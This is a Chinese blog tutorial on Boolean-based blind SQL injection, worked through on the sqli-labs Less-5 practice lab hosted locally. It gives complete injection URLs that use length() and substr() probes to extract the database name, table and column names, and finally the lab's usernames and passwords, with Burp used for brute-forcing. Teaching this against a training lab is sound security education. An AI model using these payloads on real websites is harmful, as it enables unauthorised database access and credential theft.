SQL注入——基于Boolean的盲注

最新推荐文章于 2023-12-22 17:39:54 发布
最新推荐文章于 2023-12-22 17:39:54 发布
阅读量836 收藏 3
点赞数 1
分类专栏: sql注入 文章标签: sql 数据库 database web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuan114012/article/details/124888520
版权

一.基于Boolean的盲注

使用场景:没有数据回显,条件正确有结果错误没有结果

利用方式:构造判断条件逐个猜测、

1.所需语法与函数

database()   #获取当前数据库的名字

 

 

length(str)                  #计算 str 的长度

 

substr(str,起始位,截取位数)

 

 

group_concat(列名)  #把某列的全部值输出到一行,默认用逗号分隔

 

 

二、举例说明

基于Boolean的盲注,以sqli-labs less-5 (第五关)为例

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1=1 -- -
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1=2 -- -   #回显结果不一样存在字符型注入

1.判断数据库长度,以及名字

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=8 -- -#数据库长度为8
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and substr(database(),1,1)='s'-- -#security

2.使用group_concat()语句猜测表名

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))=29 -- - #group_concat()默认用逗号隔开 ,所以表名加逗号的长度是29

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='e' -- -    #猜测表的名字同时用burp爆破

 成功爆破出4个表名:emails,referers,uagents,users

3.接下来猜测user表中的字段名

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))=20 -- -  #字段名的长度20

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='i'-- -  #爆破字段名

 

至此users表的三个字段名成功得到:id,username,password

4.同理爆破字段username和password的内容得到相应的账号密码

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length((select group_concat(username) from security.users))=91 -- -   #判断出所有的 username的长度加上符号的长度是91

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and substr((select group_concat(username) from security.users),1,1)='d' -- -爆破所有的username值

得出所有的username的值为

dumb,angelina,dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

接下来爆破password中的值

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length((select group_concat(password) from security.users))=96 -- -  #判断出password的长度为96
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and substr((select group_concat(password) from security.users),1,1)='d' -- -#得出password的值

 

 password的值为

dumb,-kill-you,p@ssword,crappy,stupidity,genious,mob!le,

admin,admin1,admin2,admin3,dumbo,admin4

yuan114012
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
基于布尔盲注
Z_l123的博客
02-18 748
关于布尔盲注 某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语 句,查看页面的返回结果(True or False)来判断哪些sQL判断条件成立,通过此来获取数据库中的数据。 一些功能函数的说明 length(str):返回字符串(str)的长度,以字节为单位。 substr(str,pos,len):从指定的位置( pos)开始,截取并返回字符串 ( str)指定长度(len)的子串。 ascii(str):返回字符串( str)最左边字符的ASCll码。 1.访问SQLi-
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3454
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔盲注Boolean based)基于时间的盲注(Time based)
SQL布尔盲注 (Blind)基本原理及使用burpsuite进行暴力猜解
最新发布
Welcome To Myon'Blog !
12-22 1862
SQL布尔盲注入是一种SQL注入攻击方式, 根据某个条件是否成立,来判断返回结果的真假,通过布尔盲注,攻击者可以逐个字符地推断出数据库中存储的信息,如用户名、密码等,从而获取敏感信息或者执行非法操作。什么情况下我们会采用盲注?我们平时最常用的是union联合查询注入,这是基于页面有数据回显的条件;但是,如果无论你输入什么,页面始终都只回显两种情况,我们可以把这两种情况看成是1或者0,也就是说,要么你查的东西有,要么不存在。面对这种只回显两种情况的,我们一般是采用盲注盲注可以分为时间延迟盲注布尔盲注
pikachu~~~布尔,时间,宽字节盲注
weixin_50339832的博客
06-03 1237
基于boolian的盲注 屏蔽了报错信息,只显示两种情况:正确和错误 输入单引号试探f
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean盲注、基于时间的盲注……
SQL注入漏洞简单挖掘-01
09-15
SQL注入漏洞的类型有很多,包括基于BooleanSQL注入、基于时间的SQL注入、基于报错的SQL注入等等。在本课程中,我们主要学习了直接挖掘select注入和使用自动化审计工具来检测SQL注入漏洞的方法。通过学习这些方法,...
4、SQL注入漏洞pdf资料
10-15
SQL注入可以分为两种类型: Boolean-based SQL injection 和 Time-based SQL injection。 四、SQL注入的防御 要防御SQL注入,需要对用户输入数据进行严格的检查和过滤,使用参数化查询语句来代替字符串拼接的方式...
SQL注入基础整理及Tricks总结1
08-03
布尔盲注Boolean-Based Blind Injection)是通过观察查询结果是否影响返回结果的真伪来获取信息。例如,攻击者可以使用`OR 1=1`或`OR 1=2`这样的条件来判断是否存在某个条件。 四、时间盲注 时间盲注(Time-Based...
SQL注入漏洞过程实例及解决方案
12-14
boolean flag=login("aaa' OR ' ","1651561"); //若已知用户名,用这种方式便可不用知道密码就可登陆成功 if (flag){ System.out.println("登陆成功"); }else{ System.out.println("登陆失败"); } } public ...
pikachu的盲注(base on boolian)
weixin_50339082的博客
06-15 1248
pikachu的盲注(base on boolian) 发现只能存在kobe’ and 1=1 #连or 都会报错 利用and来构造payload: kobe' and ascii(substr(database(),1,1))=112# 利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少盲注次数。 ...
sqli-labs Less-8 Blind-- Boolian Based基于布尔盲注
bigblue00的博客
06-16 402
Less-8 Blind-- Boolian Based基于布尔盲注 1、回显分析 当输入的语句正确时,显示 You are in… 当输入的语句异常时,不显示任何信息 2、SQL盲注 根据页面的显示情况会有不同,可以构造判断语句,当语句成立时,显示You are in… 当语句不成立时,不显示任何信息。 先判断数据库名的长度: http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>10) – + 页面无信息显示,
写一个布尔盲注的脚本
weixin_35752645的博客
01-01 478
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
sql注入布尔盲注-脚本
星空下de青铜
05-05 2919
sql注入布尔盲注-脚本 先给大家普及一下 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。 information_schema数据库常用表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的 TABLES表:提供了关于数据...
5-10sqli盲注原理及基于boolean盲注的案例演示
山兔的博客
05-20 561
Sql-Inject漏洞-盲注  什么是盲注以及常见的盲注类型  基于boolean(true or false)的盲注测试  基于time的盲注测试 什么是盲注 在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错,或者标准输出,输出到了前面,也就是说,并不会向我们之前的测试案例一样,sql注入的语法报错,给输出到了前端。 同时,当我们构造payload输进去的时候,它也并不会把多余的内容,在页面上进行显示,此时无法在根据报错信息来进行注入的判断。 这种情况下的注入,称为“盲注” 根据表现形
sql注入-基于布尔型的盲注入门
aoxiangzhi3576的博客
05-28 635
0-SQL盲注的手工注入测试 确定字段长度 1' and length(user())>12# 确定字段内容 1' and substring(user(),1,1)>'a'# 这里的substring()函数的作用是提取字符串中的字符.例如: substring('abcd',1,1)返回a subst...
SQL盲注注入——布尔
热门推荐
weixin_40709439的博客
08-03 4万+
盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔盲注。 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语...
MySQL基于布尔盲注常用语句
专注企业信息安全-sec
10-04 2410
什么是盲注? 基于布尔SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 查询所有数据库 1.判断表存不存在   1   and exists(select ...
⑥基于布尔SQL盲注
熊俊坤的博客
10-28 5011
基于布尔SQL盲注
sql语句条件判断boolean'
07-28
SQL 中,条件判断通常使用比较运算符来实现,比如等于(=)、大于(>)、小于(<)、大于等于(>=)、小于等于()等。这些比较运算符返回的结果是布尔类型(True 或 False)。 例如,假设有一个名为 "users" 的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值